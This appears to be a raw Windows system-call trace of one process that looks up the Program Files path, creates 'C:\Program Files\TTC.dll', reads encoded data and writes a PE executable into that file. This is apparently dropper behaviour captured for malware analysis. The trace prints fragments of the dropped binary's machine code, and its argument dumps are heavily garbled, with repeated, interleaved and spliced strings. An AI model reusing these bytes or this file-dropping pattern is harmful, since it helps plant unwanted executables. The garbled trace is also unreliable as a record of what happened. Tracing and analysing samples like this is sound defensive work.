 00819   456   NtUserGetDC  (0, ... ) == 0x1010051
 00820   456   NtGdiCreateDIBitmapInternal  (16842833, 32, 64, 2, 0, 2010764464, 0, 48, 0, 0, 0, ... ) == 0x6c050383
 00821   456   NtUserCallOneParam  (16842833, 56, ... ) == 0x1
 00822   456   NtGdiSelectBitmap  (151061466, 1812267907, ... ) == 0x185000f
 00823   456   NtGdiGetDCforBitmap  (1812267907, ... ) == 0x90103da
 00824   456   NtGdiSaveDC  (151061466, ... ) == 0x1
 00825   456   NtGdiSelectBitmap  (151061466, 1812267907, ... ) == 0x6c050383
 00826   456   NtGdiGetDCObject  (151061466, 524288, ... ) == 0x188000b
 00827   456   NtUserSelectPalette  (151061466, 25690123, 0, ... ) == 0x188000b
 00828   456   NtGdiSetDIBitsToDeviceInternal  (151061466, 0, 0, 32, 64, 0, 0, 0, 64, 4424496, 1351032, 0, 256, 48, 1, 0, ... ) == 0x40
 00829   456   NtUserSelectPalette  (151061466, 25690123, 0, ... ) == 0x188000b
 00830   456   NtGdiSelectBitmap  (151061466, 1812267907, ... ) == 0x6c050383
 00831   456   NtGdiRestoreDC  (151061466, -1, ... ) == 0x1
 00832   456   NtGdiSelectBitmap  (151061466, 25493519, ... ) == 0x6c050383
 00833   456   NtGdiCreateCompatibleDC  (151061466, ... ) == 0x13010381
 00834   456   NtGdiExtGetObjectW  (1812267907, 24, 1243584, ... ) == 0x18
 00835   456   NtGdiCreateBitmap  (32, 64, 1, 1, 0, ... ) == 0x705040a
 00836   456   NtGdiSelectBitmap  (151061466, 1812267907, ... ) == 0x185000f
 00837   456   NtGdiSelectBitmap  (318833537, 117769226, ... ) == 0x185000f
 00838   456   NtGdiBitBlt  (318833537, 0, 0, 32, 64, 151061466, 0, 0, 13369376, -1, 0, ... ) == 0x1
 00839   456   NtGdiSelectBitmap  (151061466, 25493519, ... ) == 0x6c050383
 00840   456   NtGdiSelectBitmap  (318833537, 25493519, ... ) == 0x705040a
 00841   456   NtGdiDeleteObjectApp  (1812267907, ... ) == 0x1
 00842   456   NtGdiDeleteObjectApp  (318833537, ... ) == 0x1
 00843   456   NtUserCallOneParam  (0, 33, ... ) == 0x2006b
 00844   456   NtUserSetCursorIconData  (131179, 1243636, 1243652, 1244232, ... ) == 0x1
 00845   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\rpcss.dll"}, 1242588, ... ) }, 1242588, ... ) == 0x0
 00846   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\rpcss.dll"}, 5, 96, ... 80, {status=0x0, info=1}, ) }, 5, 96, ... 80, {status=0x0, info=1}, ) == 0x0
 00847   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 80, ... 84, ) == 0x0
 00848   456   NtClose  (80, ... ) == 0x0
 00849   456   NtMapViewOfSection  (84, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x900000), 0x0, 262144, ) == 0x0
 00850   456   NtClose  (84, ... ) == 0x0
 00851   456   NtUnmapViewOfSection  (-1, 0x900000, ... ) == 0x0
 00852   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion"}, ... 84, ) }, ... 84, ) == 0x0
 00853   456   NtQueryValueKey  (84,  (84, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (84, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) }, 46, ) == 0x0
 00854   456   NtQueryValueKey  (84,  (84, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (84, "ProgramFilesDir", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0:\0\\0P\0r\0o\0g\0r\0a\0m\0 \0F\0i\0l\0e\0s\0\0\0"}, 46, ) }, 46, ) == 0x0
 00855   456   NtClose  (84, ... ) == 0x0
 00856   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00857   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00858   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 84, {status=0x0, info=1}, ) }, 3, 16417, ... 84, {status=0x0, info=1}, ) == 0x0
 00859   456   NtQueryDirectoryFile  (84, 0, 0, 0, 1243184, 616, BothDirectory, 1,  (84, 0, 0, 0, 1243184, 616, BothDirectory, 1, "Program Files", 0, ... {status=0x0, info=120}, ) , 0, ... {status=0x0, info=120}, ) == 0x0
 00860   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00861   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00862   456   NtClose  (84, ... ) == 0x0
 00863   456   NtOpenFile  (0x100020, {24, 0, 0x42, 0, 0,  (0x100020, {24, 0, 0x42, 0, 0, "\??\C:\Program Files"}, 3, 33, ... 84, {status=0x0, info=1}, ) }, 3, 33, ... 84, {status=0x0, info=1}, ) == 0x0
 00864   456   NtQueryVolumeInformationFile  (84, 1244424, 8, Device, ... {status=0x0, info=8}, ) == 0x0
 00865   456   NtClose  (12, ... ) == 0x0
 00866   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Program Files\TTC.dll"}, 1244456, ... ) }, 1244456, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00867   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\TTC.dll"}, 7, 2113568, ... ) }, 7, 2113568, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00868   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Program Files\TTC.dll"}, 1244440, ... ) }, 1244440, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00869   456   NtCreateFile  (0x40100080, {24, 0, 0x40, 0, 1244420,  (0x40100080, {24, 0, 0x40, 0, 1244420, "\??\C:\Program Files\TTC.dll"}, 0x0, 0, 1, 5, 96, 0, 0, ... }, 0x0, 0, 1, 5, 96, 0, 0, ...
 00870   456   NtClose  (-2147482028, ... ) == 0x0
 00869   456   NtCreateFile  ... 12, {status=0x0, info=2}, ) == 0x0
 00871   456   NtSetInformationFile  (76, 1244396, 8, Position, ... {status=0x0, info=0}, ) == 0x0
 00872   456   NtReadFile  (76, 0, 0, 0, 4, 0x0, 0, ... {status=0x0, info=4},  (76, 0, 0, 0, 4, 0x0, 0, ... {status=0x0, info=4}, "\223%\1\200", ) , ) == 0x0
 00873   456   NtReadFile  (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384},  (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "\354\375\13xT\325\3317\214\317)a\22&\314\0\203D\15\20$(\32\324h@\211\3\232\0\3\21\11N\10I@9\371\24\323q\352\201\302\14\242%\2308\211f\330\214b+\255m\251\225b\373\320\326\266\264E\305\265!\230\4\244\32\220*V\324\250\321\2568Q\203F\30 0\337\357\276\327\336s\310\1}\336\367\371\377\257\357\272\276\242\223\275\367:\37\357u\257\373Xt\313&\235Q\247\323\231\360\213Dt\272]:\371/_\367\315\377\314z\235n\310\230\277\15\321\355L\371\307\330]\372\271\377\30\273\300}\307\352\314\225\253\356\371\356\252\333\356\312\374\316mw\337}\2177\363\277n\317\\345\273;\363\216\2733g\336\\222y\327=+n\277"--5K-\243\255\362\330\352\2473~\231\251\375\266\3326e\376\205\237\365\231\357\342\271\364\206\2072\177\203\347%\366\372\314_\343\371\274}\217\372\275'\363O\234\347\311\314\3539}$\363\5~6r\272\302\221\15\374\334j{\205\237\363\357\370\216\233\312\37\250/.\247N7W\237\254S&~\177\226\26\326\246\332v\260~P\252\256\36\35m\225a-\343\361n\303K\253\236>m\374n\223\343\247\323\305\236\272\247\142\35\376\31t2\251\374\266E\303\351\261i\234A\367$\236\351#\15\272\247(p\245A\3476\365\323\300*\203\256s\244N\267\374\220^\227q\2169\3512\32t\205\361\1h\347B\303\300\351\257\360\336\276\326\213\347s/\251\375\252\327G\333\247\375\303\240-\277b\325\212\333\274\267!\375\2\265\357\313\243c\20\375\2075\223\177\205L\246{\346r\374\311Q\307 \307\320;]\375\25\337\271\347\256\273\356\271[\307%,W\323\345\367I\327z\305\252\325\253\276\203w\36\223\225j:\227\241o\275\253n\277\363\36$\254\31-\307\212\32\315\345", ) --5K-\243\255\362\330\352\2473~\231\251\375\266\3326e\376\205\237\365\231\357\342\271\364\206\2072\177\203\347%\366\372\314_\343\371\274}\217\372\275'\363O\234\347\311\314\3539}$\363\5~6r\272\302\221\15\374\334j{\205\237\363\357\370\216\233\312\37\250/.\247N7W\237\254S&~\177\226\26\326\246\332v\260~P\252\256\36\35m\225a-\343\361n\303K\253\236>m\374n\223\343\247\323\305\236\272\247\142\35\376\31t2\251\374\266E\303\351\261i\234A\367$\236\351#\15\272\247(p\245A\3476\365\323\300*\203\256s\244N\267\374\220^\227q\2169\3512\32t\205\361\1h\347B\303\300\351\257\360\336\276\326\213\347s/\251\375\252\327G\333\247\375\303\240-\277b\325\212\333\274\267!\375\2\265\357\313\243c\20\375\2075\223\177\205L\246{\346r\374\311Q\307 \307\320;]\375\25\337\271\347\256\273\356\271[\307%,W\323\345\367I\327z\305\252\325\253\276\203w\36\223\225j:\227\241o\275\253n\277\363\36$\254\31-\307\212\32\315\345", ) == 0x0
 00874   456   NtWriteFile  (12, 0, 0, 0,  (12, 0, 0, 0, "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\10\1\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\0\340}\361s\244\34\237 \244\34\237 \244\34\237 \241\20\220 \262\34\237 \241\20\300 \335\34\237 ^?\206 \246\34\237 '\24\300 \245\34\237 \267\24\302 \246\34\237 '\24\302 \257\34\237 \244\34\236 >\34\237 \241\20\377 \271\34\237 \241\20\303 \245\34\237 H\27\301 \245\34\237 \241\20\305 \245\34\237 Rich\244\34\237 \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0PE\0\0L\1\6\0\213,qF\0\0\0\0\0\0\0\0\340\0\16!\13\1\7\12\0\300\1\0\0\320\0\0\0\0\0\0\310%\1\0\0\20\0\0\0\320\1\0\0\0\0\20\0\20\0\0\0\20\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0\240\2\0\0\20\0\0\0\0\0\0\2\0\0\0\0\0\20\0\0\20\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\220#\2\0\236\0\0\0\30\27\2\0\240\0\0\0\0p\2\0h\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\200\2\0\354\27\0\0`\322\1\0\34\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\360\3\2\0H\0\0\0\0\0\0\0\0\0\0\0\0\320\1\0X\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 32768, 0x0, 0, ... {status=0x0, info=32768}, ) , 32768, 0x0, 0, ... {status=0x0, info=32768}, ) == 0x0
 00875   456   NtWriteFile  (12, 0, 0, 0,  (12, 0, 0, 0, "E\364\213M\364\211M\370\203}\370\0t\17j\3\213M\370\350(\221\377\377\211E\360\353\7\307E\360\0\0\0\0\213U\374\307B\24\0\0\0\0\213\345]\302\4\0\314\314\314\314\314\314\314\314\314\314\314\314U\213\354j\377h\243\310\1\20d\241\0\0\0\0Pd\211%\0\0\0\0Q\203\3540SVW\211e\360\211M\310\215E\350P\213M\10Q\213U\10\213\2\377P\14\211E\354\203}\354\0\17\214\316\1\0\0\307E\344\0\0\0\0\213M\350\17\267Q,\213E\310\211P\30\213M\310\307A\24\0\0\0\0\213U\310\203z\30\0\17\204\252\0\0\0\307E\374\0\0\0\0\213E\310\213H\30\211M\324\213U\324k\322\14\203\302\4R\350\340\222\0\0\203\304\4\211E\304\213E\304\211E\314\306E\374\1\203}\314\0t/\213M\314\213U\324\211\21h\260\21\0\20h\240\202\0\20\213E\324Pj\14\213M\314\203\301\4Q\350l\231\0\0\213U\314\203\302\4\211U\300\353\7\307E\300\0\0\0\0\213E\300\211E\320\306E\374\0\213M\320\211M\344\353\6\2700\201\0\20\303\307E\374\377\377\377\377\203}\344\0u\32\213U\350R\213E\10P\213M\10\213\21\377RL\270\16\0\7\200\351\373\0\0\0\307E\340\0\0\0\0\353\11\213E\340\203\300\1\211E\340\213M\310\213U\340;Q\30\17\215\277\0\0\0\215E\334P\213M\340Q\213U\10R\213E\10\213\10\377Q\24\205\300\17\214\236\0\0\0\215M\330\350\204{\0\0\307E\374\3\0\0\0j\0j\0j\0\215M\330\350?\1\0\0P\213U\334\213\2P\213M\10Q\213U\10\213\2\377P0\205\300|K\215M\330\350pg\0\0P\213M\340k\311\14\3M\344\350\221\0\0\0\213u\340k\366\14\213M\340k\311\14\3M\344\350-\357\377\377P", 5740, 0x0, 0, ... {status=0x0, info=5740}, ) , 5740, 0x0, 0, ... {status=0x0, info=5740}, ) == 0x0
 00876   456   NtReadFile  (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384},  (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "Kl!\1`\316;\203i\327V\236`\20\326\303&\225\201\33G\374\327\360\371\36\332<\342)\356 IM\230\245\227"J\255:\265\351\356\317>@\364\376\307\365\335,~zL\272\243SA8m!Q{,\21\360O\336\20w2g\260\17i\300\305\3336\250\326\365*\311\3606\213\272\306H8]\361\3626|O\263M\324D\231z\304\341\364~\335e\305\323k\306\326\260\4\23\4\350\275\26\366\313t\375\3674_L}\355\311Rz)]\26K?\344\34\351\243r5}\350_d\336\251?\372\327|\335\271\350_2\363\347uR\240\357\270Qem\273\336\225T\234\36\242\323\254L\352\313\360\215\317o\326\3709\215\375\323\367\326\275\333O{\177\320\331_{\343\351\277*1\356\313\243p\2007\200\277h5\311\262w\2775\275.c`z]\274|\312\264N\252\264\37\371\24\232\257H\257\371]z\307\377l~\257\350?}l}C~\354*Z\330)b\262\352\31\230\257\271L\202\31J\307v\17!;=\344\2300\2563}\355\217\260\2757\34\355=\342\1\334\35x\347\230ttVtC\376"\262\332\252:Q\27\252\23u|\302V\23<\17\303VS\3418r\377\22\246\274\25\2347<\220\2775Q\375^\257\361\230\347>\327x\370;\200\317\350\243Cb\225A\305"=\232\313/\314\347\362\267^\374Y\257\372\336\373\3569\307\277\241\243W\372?\366\237~@\371\214x\351\350\211\342\242\16\251\365\250\312a\14\357\210\27\177&Y\215\342\267\372!\375\305\367\37\362\302oD\233$\373\277\2\375\377n\254\377+\316\325\377\206P\357\376W\234\263\377\37|\331\273\377\347N\277\365\223^\274\230\276\373\375\217\237F"\352\253\377h?\324\375\276\366\331\261z\257#?\3621O\345,{\321\217\375)\6\263/>\250\265\241", ) J\255:\265\351\356\317>@\364\376\307\365\335,~zL\272\243SA8m!Q{,\21\360O\336\20w2g\260\17i\300\305\3336\250\326\365*\311\3606\213\272\306H8]\361\3626|O\263M\324D\231z\304\341\364~\335e\305\323k\306\326\260\4\23\4\350\275\26\366\313t\375\3674_L}\355\311Rz)]\26K?\344\34\351\243r5}\350_d\336\251?\372\327|\335\271\350_2\363\347uR\240\357\270Qem\273\336\225T\234\36\242\323\254L\352\313\360\215\317o\326\3709\215\375\323\367\326\275\333O{\177\320\331_{\343\351\277*1\356\313\243p\2007\200\277h5\311\262w\2775\275.c`z]\274|\312\264N\252\264\37\371\24\232\257H\257\371]z\307\377l~\257\350?}l}C~\354*Z\330)b\262\352\31\230\257\271L\202\31J\307v\17!;=\344\2300\2563}\355\217\260\2757\34\355=\342\1\334\35x\347\230ttVtC\376 (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "Kl!\1`\316;\203i\327V\236`\20\326\303&\225\201\33G\374\327\360\371\36\332<\342)\356 IM\230\245\227"J\255:\265\351\356\317>@\364\376\307\365\335,~zL\272\243SA8m!Q{,\21\360O\336\20w2g\260\17i\300\305\3336\250\326\365*\311\3606\213\272\306H8]\361\3626|O\263M\324D\231z\304\341\364~\335e\305\323k\306\326\260\4\23\4\350\275\26\366\313t\375\3674_L}\355\311Rz)]\26K?\344\34\351\243r5}\350_d\336\251?\372\327|\335\271\350_2\363\347uR\240\357\270Qem\273\336\225T\234\36\242\323\254L\352\313\360\215\317o\326\3709\215\375\323\367\326\275\333O{\177\320\331_{\343\351\277*1\356\313\243p\2007\200\277h5\311\262w\2775\275.c`z]\274|\312\264N\252\264\37\371\24\232\257H\257\371]z\307\377l~\257\350?}l}C~\354*Z\330)b\262\352\31\230\257\271L\202\31J\307v\17!;=\344\2300\2563}\355\217\260\2757\34\355=\342\1\334\35x\347\230ttVtC\376"\262\332\252:Q\27\252\23u|\302V\23<\17\303VS\3418r\377\22\246\274\25\2347<\220\2775Q\375^\257\361\230\347>\327x\370;\200\317\350\243Cb\225A\305"=\232\313/\314\347\362\267^\374Y\257\372\336\373\3569\307\277\241\243W\372?\366\237~@\371\214x\351\350\211\342\242\16\251\365\250\312a\14\357\210\27\177&Y\215\342\267\372!\375\305\367\37\362\302oD\233$\373\277\2\375\377n\254\377+\316\325\377\206P\357\376W\234\263\377\37|\331\273\377\347N\277\365\223^\274\230\276\373\375\217\237F"\352\253\377h?\324\375\276\366\331\261z\257#?\3621O\345,{\321\217\375)\6\263/>\250\265\241", ) =\232\313/\314\347\362\267^\374Y\257\372\336\373\3569\307\277\241\243W\372?\366\237~@\371\214x\351\350\211\342\242\16\251\365\250\312a\14\357\210\27\177&Y\215\342\267\372!\375\305\367\37\362\302oD\233$\373\277\2\375\377n\254\377+\316\325\377\206P\357\376W\234\263\377\37|\331\273\377\347N\277\365\223^\274\230\276\373\375\217\237F (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "Kl!\1`\316;\203i\327V\236`\20\326\303&\225\201\33G\374\327\360\371\36\332<\342)\356 IM\230\245\227"J\255:\265\351\356\317>@\364\376\307\365\335,~zL\272\243SA8m!Q{,\21\360O\336\20w2g\260\17i\300\305\3336\250\326\365*\311\3606\213\272\306H8]\361\3626|O\263M\324D\231z\304\341\364~\335e\305\323k\306\326\260\4\23\4\350\275\26\366\313t\375\3674_L}\355\311Rz)]\26K?\344\34\351\243r5}\350_d\336\251?\372\327|\335\271\350_2\363\347uR\240\357\270Qem\273\336\225T\234\36\242\323\254L\352\313\360\215\317o\326\3709\215\375\323\367\326\275\333O{\177\320\331_{\343\351\277*1\356\313\243p\2007\200\277h5\311\262w\2775\275.c`z]\274|\312\264N\252\264\37\371\24\232\257H\257\371]z\307\377l~\257\350?}l}C~\354*Z\330)b\262\352\31\230\257\271L\202\31J\307v\17!;=\344\2300\2563}\355\217\260\2757\34\355=\342\1\334\35x\347\230ttVtC\376"\262\332\252:Q\27\252\23u|\302V\23<\17\303VS\3418r\377\22\246\274\25\2347<\220\2775Q\375^\257\361\230\347>\327x\370;\200\317\350\243Cb\225A\305"=\232\313/\314\347\362\267^\374Y\257\372\336\373\3569\307\277\241\243W\372?\366\237~@\371\214x\351\350\211\342\242\16\251\365\250\312a\14\357\210\27\177&Y\215\342\267\372!\375\305\367\37\362\302oD\233$\373\277\2\375\377n\254\377+\316\325\377\206P\357\376W\234\263\377\37|\331\273\377\347N\277\365\223^\274\230\276\373\375\217\237F"\352\253\377h?\324\375\276\366\331\261z\257#?\3621O\345,{\321\217\375)\6\263/>\250\265\241", ) , ) == 0x0
 00877   456   NtWriteFile  (12, 0, 0, 0,  (12, 0, 0, 0, "\314\314\314\314U\213\354\203\354\14\211M\374\213E\374\203xX\0tC\203}\10\0u\17\203}\14\0u\11\307E\370\4\0\0\0\353\7\307E\370\0\0\0\0\213M\14Q\213U\370R\213E\10P\213M\374\213QXR\350\240\210\0\0\203\304\20\205\300u\10\213E\374\211E\364\353\7\307E\364\0\0\0\0\213E\364\213\345]\302\10\0\314\314\314\314\314\314\314\314\314\314\314U\213\354\203\354\20\211M\364\213E\364\203xX\0tO\350\231\361\377\377P\213M\364\213\21\213M\364\377R\4\211E\374\350\205\361\377\377\211E\370\215E\374P\215M\370Q\3505\212\377\377\203\304\10\17\266\320\205\322u\34\213E\364\213HXQ\350a\212\0\0\203\304\4\205\300}\11\307E\360\377\377\377\377\353\7\307E\360\0\0\0\0\213E\360\213\345]\303\314U\213\354Q\211M\374\213E\10P\350\20,\0\0\203\304\4P\213M\374\350\324\30\0\0\213\345]\302\4\0\314\314\314\314\314\314\314\314\314\314\314\314\314\314U\213\354Q\211M\374\213M\374\350!\204\377\377\213E\10\203\340\1t\14\213M\374Q\350>k\0\0\203\304\4\213E\374\213\345]\302\4\0\314\314\314\314U\213\354Q\211M\374\213M\374\350!\0\0\0\213E\10\203\340\1t\14\213M\374Q\350\16k\0\0\203\304\4\213E\374\213\345]\302\4\0\314\314\314\314U\213\354Q\211M\374\213E\374\307\0\4\334\1\20\213M\374\307A\4\1\0\0\300\213M\374\203\301\4\350+\355\377\377\213\25\264>\2\20\213\2\213\15\264>\2\20\377P\10\213M\374\350R\0\0\0\213\345]\303\314\314\314\314\314\314\314\314\314\314\314\314\314\314U\213\354Q\211M\374\213M\374\203\301\4\350\356\210\377\377\213M\374\350\366\3\0\0\213E\374\307\0P\335\1\20j\0\213M\374\203\301\10\350p\5\0\0", 32768, 0x0, 0, ... {status=0x0, info=32768}, ) , 32768, 0x0, 0, ... {status=0x0, info=32768}, ) == 0x0
 00878   456   NtWriteFile  (12, 0, 0, 0,  (12, 0, 0, 0, "\306\2\203\307\2\203\371\10r\246\363\245\377$\225\14\27\1\20\220#\321\212\6\210\7\203\306\1\301\351\2\203\307\1\203\371\10r\210\363\245\377$\225\14\27\1\20\215I\0\3\27\1\20\360\26\1\20\350\26\1\20\340\26\1\20\330\26\1\20\320\26\1\20\310\26\1\20\300\26\1\20\213D\216\344\211D\217\344\213D\216\350\211D\217\350\213D\216\354\211D\217\354\213D\216\360\211D\217\360\213D\216\364\211D\217\364\213D\216\370\211D\217\370\213D\216\374\211D\217\374\215\4\215\0\0\0\0\3\360\3\370\377$\225\14\27\1\20\213\377\34\27\1\20$\27\1\200\27\1\20D\27\1\20\213E\10^_\311\303\220\212\6\210\7\213E\10^_\311\303\220\212\6\210\7\212F\1\210G\1\213E\10^_\311\303\215I\0\212\6\210\7\212F\1\210G\1\212F\2\210G\2\213E\10^_\311\303\220\215t1\374\215|9\374\367\307\3\0\0\0u$\301\351\2\203\342\3\203\371\10r\15\375\363\245\374\377$\225\250\30\1\20\213\377\367\331\377$\215X\30\1\20\215I\0\213\307\272\3\0\0\0\203\371\4r\14\203\340\3+\310\377$\205\254\27\1\20\377$\215\250\30\1\20\220\274\27\1\20\340\27\1\20\10\30\1\20\212F\3#\321\210G\3\203\356\1\301\351\2\203\357\1\203\371\10r\262\375\363\245\374\377$\225\250\30\1\20\215I\0\212F\3#\321\210G\3\212F\2\301\351\2\210G\2\203\356\2\203\357\2\203\371\10r\210\375\363\245\374\377$\225\250\30\1\20\220\212F\3#\321\210G\3\212F\2\210G\2\212F\1\301\351\2\210G\1\203\356\3\203\357\3\203\371\10\17\202V\377\377\377\375\363\245\374\377$\225\250\30\1\20\215I\0\\30\1\20d\30\1\20l\30\1\20t\30\1\20|\30\1\20\204\30\1\20\214\30\1\20\237\30\1\20\213D\216\34", 3510, 0x0, 0, ... {status=0x0, info=3510}, ) , 3510, 0x0, 0, ... {status=0x0, info=3510}, ) == 0x0
 00879   456   NtReadFile  (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384},  (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "[\215\342\16\306\307=\371^<\313\215x\316a}\231\265\226\14k\354"\311\20\361:\371i\353.kN\216\311\211\220\332\334$\2\352\363\240\177B\230%\320\223m^z\226\231\3#\326\322\313\32K\365'\204o\373O\32\2\223\357$f\214\245\3725\35H\267\362\213H\244{<\372m+\361.F\15gD\305ZC\225\212\311V\266\273\223*\312\207\253&\206D\346\215Ts\25j\336\3664\21\216?\207\27\217m\355$/\377\12\23$\326]!\362f\363K\24683\223_F\302t\341\345c$\248\222\324\206\304\35D\26\22\217!^\374\15\247`\350I&\0p\324\372;"i\364\314Kz\32\15\2S<\207\2643*(\351\243H*\16`\273\207\312\374a\203o&I\0\221\374\312\246\2"7\325\36\7f4\21\4\355\271W\21iQ7\2230\3452\257]\370\10M\216\214\270\223\264\207\346\231"\201\344\320H\361\235\2170\324\300\321\241Wm\4\345Q'.\204\34*\2\362\203\267\367,%\2218"Y\323\6 \301&\4\23B\355\263\344F\34@\247\362\246Q\373\2545\344\231\26\20\312\321\5\260z\326\340\273j\353v\14\10@!\316;\33\241;\221V\344\312\253l\267\326\3242\313\232\3\305Eli\246\35\351V\341\20+\341\260\221\311\222\14~V\357\33\2\320\236ZBX\241\10c\373:NP\341F\337\2452!\251\265b\250py\240\202\275\303\265*SK\242\252\31\21P\365\2\262\317\5\221)W\261Xx#\3KU\264\7\3347r\365\216>n\355$e'\t\322P\346\20\377\264.|\3521\342\177\233\243c\2014q\352\272#\274\326\3621\250D)q\267X\243\242\216\304"\17\334\231e\203\370\223-\273\215x\346\240\206\337.\310\275\225*h\10:9\374\320H\346<\310", ) \311\20\361:\371i\353.kN\216\311\211\220\332\334$\2\352\363\240\177B\230%\320\223m^z\226\231\3#\326\322\313\32K\365'\204o\373O\32\2\223\357$f\214\245\3725\35H\267\362\213H\244{<\372m+\361.F\15gD\305ZC\225\212\311V\266\273\223*\312\207\253&\206D\346\215Ts\25j\336\3664\21\216?\207\27\217m\355$/\377\12\23$\326]!\362f\363K\24683\223_F\302t\341\345c$\248\222\324\206\304\35D\26\22\217!^\374\15\247`\350I&\0p\324\372; (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "[\215\342\16\306\307=\371^<\313\215x\316a}\231\265\226\14k\354"\311\20\361:\371i\353.kN\216\311\211\220\332\334$\2\352\363\240\177B\230%\320\223m^z\226\231\3#\326\322\313\32K\365'\204o\373O\32\2\223\357$f\214\245\3725\35H\267\362\213H\244{<\372m+\361.F\15gD\305ZC\225\212\311V\266\273\223*\312\207\253&\206D\346\215Ts\25j\336\3664\21\216?\207\27\217m\355$/\377\12\23$\326]!\362f\363K\24683\223_F\302t\341\345c$\248\222\324\206\304\35D\26\22\217!^\374\15\247`\350I&\0p\324\372;"i\364\314Kz\32\15\2S<\207\2643*(\351\243H*\16`\273\207\312\374a\203o&I\0\221\374\312\246\2"7\325\36\7f4\21\4\355\271W\21iQ7\2230\3452\257]\370\10M\216\214\270\223\264\207\346\231"\201\344\320H\361\235\2170\324\300\321\241Wm\4\345Q'.\204\34*\2\362\203\267\367,%\2218"Y\323\6 \301&\4\23B\355\263\344F\34@\247\362\246Q\373\2545\344\231\26\20\312\321\5\260z\326\340\273j\353v\14\10@!\316;\33\241;\221V\344\312\253l\267\326\3242\313\232\3\305Eli\246\35\351V\341\20+\341\260\221\311\222\14~V\357\33\2\320\236ZBX\241\10c\373:NP\341F\337\2452!\251\265b\250py\240\202\275\303\265*SK\242\252\31\21P\365\2\262\317\5\221)W\261Xx#\3KU\264\7\3347r\365\216>n\355$e'\t\322P\346\20\377\264.|\3521\342\177\233\243c\2014q\352\272#\274\326\3621\250D)q\267X\243\242\216\304"\17\334\231e\203\370\223-\273\215x\346\240\206\337.\310\275\225*h\10:9\374\320H\346<\310", ) 7\325\36\7f4\21\4\355\271W\21iQ7\2230\3452\257]\370\10M\216\214\270\223\264\207\346\231 (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "[\215\342\16\306\307=\371^<\313\215x\316a}\231\265\226\14k\354"\311\20\361:\371i\353.kN\216\311\211\220\332\334$\2\352\363\240\177B\230%\320\223m^z\226\231\3#\326\322\313\32K\365'\204o\373O\32\2\223\357$f\214\245\3725\35H\267\362\213H\244{<\372m+\361.F\15gD\305ZC\225\212\311V\266\273\223*\312\207\253&\206D\346\215Ts\25j\336\3664\21\216?\207\27\217m\355$/\377\12\23$\326]!\362f\363K\24683\223_F\302t\341\345c$\248\222\324\206\304\35D\26\22\217!^\374\15\247`\350I&\0p\324\372;"i\364\314Kz\32\15\2S<\207\2643*(\351\243H*\16`\273\207\312\374a\203o&I\0\221\374\312\246\2"7\325\36\7f4\21\4\355\271W\21iQ7\2230\3452\257]\370\10M\216\214\270\223\264\207\346\231"\201\344\320H\361\235\2170\324\300\321\241Wm\4\345Q'.\204\34*\2\362\203\267\367,%\2218"Y\323\6 